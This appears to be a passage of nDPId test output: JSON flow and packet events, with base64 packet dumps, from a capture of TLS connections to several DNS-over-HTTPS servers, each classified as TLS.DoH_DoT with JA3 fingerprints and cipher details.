Fm3MjO7iYnNl4v1+ChQKVR7XODNZWDH3jwqcZ8qhbkD9u5SI6j\/BA1C0rUPcBjh1+6XjoNgW\/MuFBBpUx0b9PcVFriOAhMdQziZ17xbnHnF7nwzD4ltsyPw098+Y62NYg0g7ZzmYgr7Bp\/OQu72rrzto9ZurPdNMKCU\/kuUSQfJNRXnpCKpphgwF89PQmt81ZhzDDg8jGUYjA+eCwP5b5c3W1mHz2rbpTYaJ5WAEPawg7kcD\/0daljt7SoSzY0j1SW+z8PqelVSwUwhQf5v+dUBJntKDTvIA8dd3\/P5RebSAS6fwWCMpEa2Wpe0EbiTKfmmwomuAMmkjN4HlloVMdOTeEonHISxyYlgXipaeXT8CPFbuFXE4ejDU2aTkR9\/ZIbgoZdx7IXmaK+NxS9KICVTe0LPka0QmobSr15yArkyNHaP1EjswXAwMAYdZTBGnK4vcmbufHHRKWT+kPKyQO98Boq8AW86\/7q3c0DIh4T2TuGPAeaW+ueW75g7BJBBU7YuGFvnEEgi07qTSBXDL1UISZX8PwWOHA6mln36hZp5MmWU+JESIy2cQgYeQXAwMANQq+Suu4\/zFTPT1s4z\/CUiKzLUAWytPdwzfRZmXCp50PDxLOSYvzo75EbO+96Njs+ccRggY7"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739385090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739385090,"pkt":"REREREREZmZmZmZmCABFAAFGrgFAAH4GLMUKAAABiJDXnsvQAbv3Oz1sep96IVAYAfYiJAAAFgMBARkBAAEVAwNZtcLiAhjzwZoFuSzepzhVh3+I+642bR2Bdc1go+HJvyB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG9oLnBvd2VyZG5zLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBPoxVI1tXnUcUqsbORFpVub7e\/4DvFTpQM4hnCin1UEw=="} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739385124,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3170,"pkt_l4_len":3136,"thread_ts_msec":946739385124,"pkt":"ZmZmZmZmRERERERECABFAAxUg1ZAADcGk2KIkNeeCgAAAQG7y9B6n3oh9zs+ilAYAO0tMgAAFgMDAHoCAAB2AwNC32Ly6HNyagXW\/50d2q6qJAOmShuP86HMxipBKzBmwCB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOBMCAAAuACsAAgMEADMAJAAdACBiVzglBWvQOWIt\/inusfkCbeAeDbm6AiXUcYUQ0SeUdBQDAwABARcDAwAgVY3jrnTrJkAawm+Mv8gBTn6zfdywiZ3PkfSROpmIxNoXAwMKFapXpMK700YralL2NJ+2AqPfCUAacni3qdcZUnufsXl31+F2NSHowZS8bEZc4wYIOhESfjBH81NgZUBCJL0cGqDMG7c\/GafBLHylsDncbVfIqhYnumIxgnBjMekzN4Jr3Pc5g1dWYk4XIPvLeMa1AeLFQqOY+unh1DHuo4FV4KfjYjnh7ERuvhffEbloWyMHFdAQi8p2J65FwIVJHxtFX6hmaEMmHATlFHHOx1RIGQmbmA5r5k0vgPGiuUMBe1e8Ay6+kNyhTTutV32hMuU4\/4gl06pCrT6iDU4Fx4eNT+Bo6E12QIKo042tC7Wn8Kl\/KILiC4TaY1uTO0+LE4wVqs5DJHWwykde\/Mpu9moeLZ0VhV6Rnx2ocHW4rczn9gPX5qTiTrDgHO7CKCVp0Yo86Aw2suyeRkNR6Pz2DTuex3RC6JD+6hKlKYjQfx6kO1r8jKEZ8UZCGU+Rw2Pd2IT\/whiiT5Kf7zLPm28Fu5xYAFYob+TbRXBcQ0z8XUJIWzCMQvkjyj\/EBbyfhm8Iz194guweTL19Y3Q2XO+NnAUm9ihjSHpRimJ0Ale\/24shK7Q0gI7NtX4Sy93vR61pN+Zbul9p4+Mos8cFPIfYJPR5DmxNv9L\/cWnYOwtiE8KnRSAYR+6q3d\/0S6rIgkskZa1GGNAffeDtgnD5SVrh+YhdzCWZCb6834ULGghfWcw8DVqJTSeWttzs5JvcUzLfaxv2WQHaWCXuUpmCZy6HgKkW3jxYYWr2tyqizXXXq732dtVhz4LWmL9EHS1WzONzEhrNFQDtpAQ95k9MRPEdXjg0bNse0lpUI4AUqhIkxWgs0j+8YRzV3BBFFrpEwA3Ylhpo+Wbg8IG0hFyThCaHTvj0vN5WKh94GQCSIjO11AtJoS9k0tl5NWJ7dp2n0NCYI25hp41FivaF\/BBZqFxHTd\/4w8k1KmIQOky6ICw7WRykbaqxzUboD5Bq7peIuOsiwZoUMD+BDbF\/3fE\/CVHWoaOcr09A0PaL0PLhUDjARYyrR4LsVfpqkH4CZh+5Jr1aOIJ+zgcH7Gme4o7fpj5Ml+hu\/y+kOOZZN5J0XdtmvZE5w20Osrk+W9YsiLIeYNt9SB2i7LEsIRfsOrVhh9XsJ8\/VF+0Pp0BTxOsC+9Ft0\/Qj6hgm17CCVsOwdD0VhkUWaus1O+o2PGnC8v4FL3kFyyqT6BtubEcffH1AbvnEid+VZXXjMTJvMB6eWAs+UqpOrNnkCEZAK35TZ0tRUT\/0MJ65M3rSS8cnt+LL4apIWh9CenPODN35ZvH8b3XA1lwJHej3o7w4KZBEvRoLt8OxNNvwpgMfHbFpXZIqbODt95v1PnTJxwC\/vTEturbRIFjRNgt+KCX3zfwvULi6DBxiqBmChwECudELdgYVXSzaQF56hOrspt7m7cSP\/bSuhLgvGoeM7hRIXBgEFXWWobiqWKLPkIiUnd3zKygePoMYOZHF1u2D1V4jxKHpRJ6c0k9v9f8PV1\/2cqY\/66gHBBbRV41oC7rjWm5aIoPFQPYH0PovphDScGBnJ6jwAMRZhEh8stnUD5D9slPJ\/emP0c\/PTpb6PEHZyu0Q7qMTKM1bbEpBCcvYFzyVsCvmHuicyOKAs3xMxmCmWm4Eqf7griGXbNKYrhS8laSwuwkSEnXVtwhIr1b+a3aGOTQNdzJzZMKbJeIH1FS5VDDqACuwzlpn2\/PpEcmP5h\/q7H0tPqDs+gUGEHDMancSkknkDjnO8AWIHrv7XSmAw8MzBpM2IwCdCuY2dZXBowy6lZV\/inUY7ZvvXtbP6a8QnD\/\/IUygRpu63NQLm4VeKCFEprpn1cgwz5cL4vjrW8z1Oy+wINHvxXqkotg8FbTmtoSQdi7m2\/uaxkwXGvCE+Ey\/VyskJtt+1lkVPt6gqRb1ZVRQm9DD0JoMxHNgFOAaDrB+WFlvX4dGQvQzwATgRC8IKAuMZ8oKSe0p8HpA+6MvWjcmzVE8kVy6HlIQ+H75lU+B2jVUeDC7BKjayT8YnFAN9VHJiYBcwsc6cBByDnSSlpjY95o1fVD\/OvMoqArUx2Avc07VIGr\/MqkoiuFsBZpt7HMy13Sks4rLBRM4blbz1tgnQW4V9XKGhwXXv\/r\/C7JzoFDKo1O5LL2d9NrS47Pk6pIUPyJaZQjYfdcqsgSPEYWloR+Ff71Pv2pzjT7Sxhw7YViV\/havSqMuVAeVNrx2FMlZ7\/Bjxt5t67OkjvVTbouDt\/zCvvPnjRGuWwfp0n7UEFUPBk0VQxxGTP46k14fFISL3DGCnaRmvSrBlk9oDA6joQ7sLe2wbd3yp\/7JTFG1yDws5hd9oSrDxTaFhT45Qw3wjaIXqpHrDVkIJVV3fSH3u051VvqUmuXNvgcA8QfJRF+xOWpwuJtANd+GaqvaC+iETLzkP5VxYMxDGAjzMI0o+7huhk06Ls+Jf4doAnMQ5xvzlXN0Jrm+66K6cwpPwq24uT0WBbVDSG8a63HdMk9Pitugm8gT5TfsMmkXcm8XvYm1EpxDTSUVXFdXoLfWyXIhhuACKArB7XcNbTOuzKmBQBNDeLFYB1E9Xt4xRs2cOc5M8BTSXsHSPQTYdc21dTZiVfSAP6\/2Gshg6m4bugupSvk5LVq6A3lh9ffmzYt3Db3zvnfSy\/Tt0BCYi48I1IzHC+nCbjFn40UDUHc5XrNCkmhQS1xNJg2qHFTjjUPePEW4+j3bBQRUYXBtmXyjbe7imkVYxn1jKZ8UW4USSgX9QTTgWMboFPNKvAGle0s4p63tKesbx5ZYZnXD1JMoq2wiuX3opjO2N0ancv\/RxoLDDssEhCe9dO3easTHhI9ARvh9rKZYKF6v6Kl1ISp1JmJSDWM7inua1o+4o1SDMyo05cBVGhhMTS\/9p3uBa3Q1+zink\/HkPt7+J8Qdeq8lFck+4f63IssnVRJTPYYtIlJvBDnEIzxlrIFjJvmSNN4lcsRZJPOIHxFfXw8TJRTgsvPxtdi3tSQFm4F+2sukCmWqPEy6giI87MQfoD2C\/Yj2M+9KXDCNq9W6tv2b4CTjfHZU+XTLbVYONSXTzAYgn5lkwz08bD2gqCs44qF\/KSJheO2v6XSQicbKpwE887mn21\/pZ1Aw7fFPdQKOSr+ozmKo3Hb7k8xRc9xS+jbMArySJEwlivY0HatI+S+fkF+iQUSFVepgBMwShL52IjMRPaDyXtnlg9nE04NDcI9V\/O40c8DJA21O6zuYXUndYIEnkJP\/UZOqiU4vEYGHHSxvu9z+OTP3HTmjMdAhSyUL1oGolZq+yT9EbInHY55rq655Oq72NwpUp+JpPgCJKsED+NjtqOZ3sxznqDpY1ghAohk4yNRdPDZzbaGgQemzPXCmXrFUsJTwcXd\/xU2NomnNTP3pmszYNUkgCR3tnkTvld9wZ\/IPs3fkgYPdntgi8PuMGjCH6ME+NhxjtV2MwDTodlIXAwMBGU0t8RnrdJi\/j1+SnvZYpC3oLybUZ0YAwC7FNMEEzD3PWZ1mQcdYkqPO6V4n6ARpcK+AxFYr2ZmYp5VZ6aP4ufUuA8CpPBGwUlNcZ3M2nwocOtccZ2oJCl6+gngVMfWFCnvPyKdJAIVEiwSYCs+M06T9K8Dn7IVtMoEfwHeIvTYluO2bnPQHkZLgVvtx4CODgchK9krbewpUgSyVMOqarNN5yC6WFzhdNiofu8YhqHlXXyYNaQehlZN2BSM6BAq9rstGdYvwLr32NuZBk40ppHqXSd1NL8zbf+k8yuXVg+g2tFIIoJcrHKG\/jMtPDHaZoxXSW0XP9QnmktFPm2sVrC8auYwtvIIcyHfmG4LUFWv9oOl2RWB0AiDdFwMDAEX95TGyYknbRQv3FxTdx\/ySOpsXyo9B3C1mQe9wKL+RuBQiooWFUmPWbB6tbYWNx9OjEFACLxCx4a2G5wYexWMh\/ScbEd4="} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"thread_ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":946739385126,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739385126,"pkt":"REREREREZmZmZmZmCABFAAB4rgNAAH4GLZEKAAABiJDXnsvQAbv3Oz6Kep+GTVAYAfUhVgAAFAMDAAEBFwMDAEXEY3mnjR52mKqLxIMUmRZZcXFLr4uTi7u4xG7UfhN8KpUlgxkvImJLngXBZJdhlsdOO80qBVROy\/zQG1hjQj9e57h2KPE="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739385216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739385216,"pkt":"REREREREZmZmZmZmCABFAAFDj7xAAH4GQrYKAAABaBwAapkuAbuxqh8KTGGTY1AYAfYqeAAAFgMBARYBAAESAwMGpOiD7bGSBZJpQPwx8jjTz98dXRQiG2dJooZruAvSbiD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmNyeXB0by5zeAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACCocx\/g1t9BSq0aHoBq6EokYegQUNndj200eG6GOsFbfA=="} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02429{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":946739385246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAAXU\/OxAADcGF\/VoHABqCgAAAQG7mS5MYZNjsaogJVAQAEIzqQAAFgMDAHoCAAB2AwOeWrg8chGRKGTlO6HJ1p62TG+C+NnG3SsfyKZ3JDWszSD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoBMBAAAuADMAJAAdACBCHrrBrdBjTxY914LUzlqx\/FQ6u0oPg+tIKo8Yp0xoIwArAAIDBBQDAwABARcDAwk65sXHo5FyUtAiAM03V5kAW3+LXGLR2yplHW327Ar7lBVn+cWyqRXyVDveXS6Tg0vk7DEhWyy4Lki1hEqLM5o32Zp445RQDsbrctFBNFcOMJmryYHv6cTI1ALBX4o3m7ShqxgiNr648SOfRyoVsKr13ok5Co8m3yWWjvTT7U22a\/V25Yf1TTU5ZX3C3nLhUlp8F4S6K70cvraldnw\/uD6FRUq1lAFYY+RdFtBona62R3kW3zAEmLHlxjwypAF3Ed8HpEUN3N6Hh8WR8FPduTTrU1rGJcfthDCSePngGTmyI7kai\/r2bxnw0X75rGWPasNSz\/szhNdRWEo0KOZIuIIBBW21rDG1KEO\/5TMjvtncyk4jgN5jajgEgs3G7B7IN47mqI9K2FWa09ZHw5D9ghGF6WusPDND4+h9gRzFYMTRQAs+YDOQfRoqmeDcHvQas+1JnEYjeG1g+nCoph2J1xKskq4pSu\/4\/GnANXkQNNVNHjjq8pJ5wm6ibeZE1gq6PVr0nZRMBq7E5\/av8PC0+acRxKixaAa33wWyU6SeZcL1kZkunKDWXWcdvdQy51Xenyz43fec7O\/+7mHHRsySVytdXjgD0ZKChXJn+AmwQrC7OY5cEE84MSyXQywUeiGMZz6HP3Gxw+6pQWrQZTjvM2lPibOGlOclGV30N96QQ95Wm7tUJbwgXYzy1Ap3e6BhUMIyFcI9\/pMzhGjOExmlzyT6BDYONbNyjHW2odTpZ8WjTWXt5ItMp4Qf4ciPCegZXwYLxQYwEVRpcpQCUbjq9DqojYcETIPE8pYwv+pEogBkJ36XO7ISaByslei0uwlMTDGqahxFUG9xNqF2N+uBuGm3rP1N0De6EH72L31wAMHQLr+g\/Z6vH8L0t5ZBiVyHRYWFiBaqBS7sS5CL7XIwxWU5nT4+O0vg9\/RKsE8R\/V3oTcaEyuOxZPN2ld4OexQ1VlWcqVQyk2Twbmq7OKKuOtMkJEEelQzBbVDHxrvHpN4rIHzn\/9TLkc3K+Gw0IKsO0YEfzDLQOy1LPBOrUtSvkHpTT\/9tKCeQ5oeaxAcdxjrW8Ob6O3OfTjPur4i7Dr1vbtCqdprUT3YFFMRDZ26nuYQwhC4uKvrLCR3YBND9okLFnTd\/lUt6yGc2upOIbcXBXCyaL3ONPVCFw2rLhSE+P67Rrx0pQ\/PN3BUeVHTUY5OZL2UVofmKcp3kyCsJpqyPvgqtN6sEvjlAvawn31gSxqPJMO+J4TEIN4NsQHeQPoQbqZEwJ5dggsoNl6xy1PlfH8FxBn\/\/\/Lr2eBnvYK65olzMCuvQ8qYuGMLDeKU+eAivsl062ELuv+\/dM8uhg7Eno5vDfDKFHEJLzWRw5E8iFnEoRLS95ap\/irULTPgAA0QmZ5jn1YuEDktj\/0IeFc53AUQ0iqNqf8q3TqQngAAZUKBI7Sk44RP395w1L0Eyzfl4IxdNlReV035GNhrN\/DGIe5cd9OmCUDwyYWDZ5z1ksNzw8W+uzpiwBt55f0ZJkvLbFgiMA+gkUt4hT8f5WK5dSjcjsu1hL60eqoQvBa0lWD42dAL0xAVrNk06unSiy5OJX2WBK7Q7No9ybhYFoGzDI8ZzAHGp1Xz2h+but\/3A\/uToYXT+zhFlUes\/MlMz6r15CtQUfWQhXV2DbcqYzcNr7XtwvhWwQRBQjoyEwldiUNrV4kfA5BNVrLK+IAb34EZEEXlsaVEYZdfTSkwf5mFzUW8YEGENVFtWYgvqKiwzQRm4Hnu9"} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"thread_ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":946739385246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1102,"pkt_l4_len":1068,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAARA\/O1AADcGGYhoHABqCgAAAQG7mS5MYZkPsaogJVAYAEL3vQAAj+eEnaAC9OtjNn9ZDhuY0QkIU8Et3SozIjmeFN3jl5ynvaSd0TNRCmKpUZKf\/fvqVCNBLPVpc+a1\/34xSlEnpJggvfLX55X87U+wFE+Gr7WzyudHjYSOPmOcexDC2hRAzeXYq1TgqVwJwEh4MCpq5hwfPH3wEyqIpcTyPqNEKua3iGoGl0jDllgnOyDy6qMtoHeGHyOqCPa7ViWWNsuvANnFYfP4DWXgq8fcNnwinGDW24misysy6Sky1Qfcgf01K751PVkPm8BzlnUWtr7bdFh8y4G4SaM7Ac3Zldy8pQDT1EbhFcuRGdsZ0naorgHPYs0SmR0Y3t6UYCsF0YOkjsdAEbpFIfyrBCBlh4z7aJh9xKrg\/5jQsdBuWbO9f+feot414m65BkfEsJNZt6q0OhiZBadbjN3fS3WVyRW59gC6+MXzyIF5Wxx4OnO6rWDTIiTViNpHvl70VUj6EIp7jtN+701iQ9XIbvLRRNs1dMLQv4llg0va54eLOiI8Tefj84dHZQatLYpsLcK1X1xgMBQvJdmlFwbKncCrUOCkGSrsZ4LVBWhcaxKoO36xnPPDV8cinSkrG\/rQoYT4tiAfTIWSqbjcWcgucf0EZWFYbi9MDrGUzUcZr82zbUhnYlEj1+aY2lv2lSt5AqGSaUKeQRwioCypPc3dHt1C72aRiX4CCSBeRj4DN2l\/vJTlcaPiDNg7t6TPWllts+Co\/OdFgVAkJAl+HIZBjiQtPGdBZH0Q8WHs19m6ieXdVdu3SXksmcJ4OArDrkVebghoJZJUEvtdYdAu0CxG32Y7Bdxe9zNMbKMIjUZThhjnA7hE+UoUNNr4aUW73torTPDm\/PasISFjUH1CHoDvjfn0IYzqO2vVaat\/SFbmMFs6UfAByhfgtTIBdM4vlalC4vJ\/3gPNzVh1u1xqYYIU6wN60WQoEexxjHdAMBBR1w+y4czMCbyPxsYOQzTZedkx2ofb\/xA+Z+8rEmaj0xb8Fyln6Nq8bsbjlAzp8F+BPhhygJC1D1SpxfIjpLhJ5pR8cCPnmFuv4Wb6pCT3F\/xJW7qpcmMvdn7rOqlw0sLhKBRfOeheFxSJrKe9iavOuolDEItae4jRrh8cRuAabSIDs\/KL9d4qTkbOnc6ryMLcKUz4QDjr3QIMIHJiOX9+2DVL5+3CGc336xPBx67NPWns3pKxWZovEglaPedBeKa1Ay9zwVrpcshhz8ZViqEZyeGf3Bhnr9gYf6a2k+91KFhxPRsj3wr6DG1ZrNf\/1DpWp8C8Eic8yqmZ7eLKXZwe+Mz2GUUCbxCXRoPG9q7XWM+v0cWz5lxW0nXaPM0vHHCL7Iqhc5wjeX5d9z5lx39pQN3jzFWZB4SuiTobndYtfC9FvqzivwC8uagzgYQI8AhesQ=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739389936,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739389936,"pkt":"REREREREZmZmZmZmCABFAAFBc1lAAH4GKTYKAAABLUxxH8s8IPtar+ZR\/RI3kFAYAfZgWwAAFgMBARQBAAEQAwPDKTE3gtHe4YkRucyB7lgiewe8eRdkAeXi8xQ\/UXf8siCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALZG9oLnNlYnkuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgBTSef\/+Gs9funZgaOAKPCcHz5qP34E4cKsNkKCajyxU="} +01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 